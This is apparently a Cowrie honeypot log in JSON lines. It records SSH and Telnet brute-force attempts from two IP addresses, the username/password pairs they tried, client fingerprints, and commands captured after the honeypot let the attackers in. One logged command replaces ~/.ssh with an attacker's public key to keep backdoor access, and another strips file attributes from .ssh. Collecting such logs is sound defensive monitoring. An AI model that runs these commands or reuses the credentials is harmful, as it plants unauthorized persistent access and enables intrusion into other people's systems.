{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:37.136832Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37838,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8f45fcc0da0","protocol":"ssh","message":"New connection: 212.227.235.229:37838 (1.2.3.4:22) [session: d8f45fcc0da0]","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.217967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.218893Z","src_ip":"212.227.235.229","session":"d8f45fcc0da0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.301359Z","src_ip":"212.227.235.229","session":"d8f45fcc0da0"}
{"eventid":"cowrie.login.failed","username":"lai","password":"123456","message":"login attempt [lai/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.672104Z","src_ip":"212.227.235.229","session":"d8f45fcc0da0"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.929946Z","src_ip":"212.227.235.229","session":"079d67477946"}
{"eventid":"cowrie.login.success","username":"root","password":"Wn123456","message":"login attempt [root/Wn123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:38.947655Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:39.503437Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:39.504115Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:39.504936Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:39.756650Z","src_ip":"212.227.235.229","session":"d8f45fcc0da0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:39.774568Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:40.779456Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:12:40.780387Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:12:41.052113Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:41.053097Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40364,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a66233d5d74","protocol":"ssh","message":"New connection: 212.227.235.229:40364 (1.2.3.4:22) [session: 6a66233d5d74]","sensor":"my-vps","timestamp":"2025-08-31T05:12:41.297398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:41.298054Z","src_ip":"212.227.235.229","session":"6a66233d5d74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:41.558269Z","src_ip":"212.227.235.229","session":"6a66233d5d74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:42.637946Z","src_ip":"212.227.235.229","session":"6a66233d5d74"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:43.899897Z","src_ip":"212.227.235.229","session":"6a66233d5d74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40378,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3227213cf2","protocol":"ssh","message":"New connection: 212.227.235.229:40378 (1.2.3.4:22) [session: fe3227213cf2]","sensor":"my-vps","timestamp":"2025-08-31T05:12:44.158361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:44.159619Z","src_ip":"212.227.235.229","session":"fe3227213cf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:44.410710Z","src_ip":"212.227.235.229","session":"fe3227213cf2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:45.416742Z","src_ip":"212.227.235.229","session":"fe3227213cf2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:45.669367Z","src_ip":"212.227.235.229","session":"fe3227213cf2"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:45.674244Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55854,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff08db5e7388","protocol":"ssh","message":"New connection: 212.227.125.160:55854 (1.2.3.4:22) [session: ff08db5e7388]","sensor":"my-vps","timestamp":"2025-08-31T05:12:51.603262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:12:52.040877Z","src_ip":"212.227.125.160","session":"ff08db5e7388"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:12:52.041712Z","src_ip":"212.227.125.160","session":"ff08db5e7388"}
{"eventid":"cowrie.login.failed","username":"server","password":"root123","message":"login attempt [server/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:53.873625Z","src_ip":"212.227.125.160","session":"ff08db5e7388"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:55.468931Z","src_ip":"212.227.125.160","session":"ff08db5e7388"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41566,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dc4bc0092f9","protocol":"ssh","message":"New connection: 212.227.125.160:41566 (1.2.3.4:22) [session: 6dc4bc0092f9]","sensor":"my-vps","timestamp":"2025-08-31T05:13:03.008030Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54480,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ebbfa53343e","protocol":"telnet","message":"New connection: 212.227.235.229:54480 (1.2.3.4:23) [session: 7ebbfa53343e]","sensor":"my-vps","timestamp":"2025-08-31T05:13:03.017479Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33560,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2925810212","protocol":"ssh","message":"New connection: 212.227.235.229:33560 (1.2.3.4:22) [session: 0f2925810212]","sensor":"my-vps","timestamp":"2025-08-31T05:13:06.378419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:06.379351Z","src_ip":"212.227.235.229","session":"0f2925810212"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:06.648416Z","src_ip":"212.227.235.229","session":"0f2925810212"}
{"eventid":"cowrie.session.closed","duration":4.88534688949585,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:07.902741Z","src_ip":"212.227.235.229","session":"7ebbfa53343e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54490,"dst_ip":"1.2.3.4","dst_port":23,"session":"75bbc6bd85e0","protocol":"telnet","message":"New connection: 212.227.235.229:54490 (1.2.3.4:23) [session: 75bbc6bd85e0]","sensor":"my-vps","timestamp":"2025-08-31T05:13:08.127976Z"}
{"eventid":"cowrie.login.failed","username":"pedro","password":"123","message":"login attempt [pedro/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:08.527091Z","src_ip":"212.227.235.229","session":"0f2925810212"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:13:09.773747Z","src_ip":"212.227.125.160","session":"6dc4bc0092f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:13:09.777218Z","src_ip":"212.227.125.160","session":"6dc4bc0092f9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:09.798344Z","src_ip":"212.227.235.229","session":"0f2925810212"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:13:10.573362Z","src_ip":"212.227.235.229","session":"75bbc6bd85e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:13:10.596336Z","src_ip":"212.227.235.229","session":"75bbc6bd85e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:12.481494Z","src_ip":"212.227.235.229","session":"75bbc6bd85e0"}
{"eventid":"cowrie.session.closed","duration":4.359565258026123,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:12.487469Z","src_ip":"212.227.235.229","session":"75bbc6bd85e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44870,"dst_ip":"1.2.3.4","dst_port":22,"session":"109cd9742703","protocol":"ssh","message":"New connection: 212.227.235.229:44870 (1.2.3.4:22) [session: 109cd9742703]","sensor":"my-vps","timestamp":"2025-08-31T05:13:25.248358Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60390,"dst_ip":"1.2.3.4","dst_port":22,"session":"817cfc421231","protocol":"ssh","message":"New connection: 212.227.235.229:60390 (1.2.3.4:22) [session: 817cfc421231]","sensor":"my-vps","timestamp":"2025-08-31T05:13:28.080509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:28.081471Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:28.356130Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44746,"dst_ip":"1.2.3.4","dst_port":22,"session":"9692ed47ba6c","protocol":"ssh","message":"New connection: 212.227.235.229:44746 (1.2.3.4:22) [session: 9692ed47ba6c]","sensor":"my-vps","timestamp":"2025-08-31T05:13:29.244464Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123!@#","message":"login attempt [root/Qwerty123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:13:29.499551Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:13:29.990269Z","src_ip":"212.227.235.229","session":"9692ed47ba6c"}
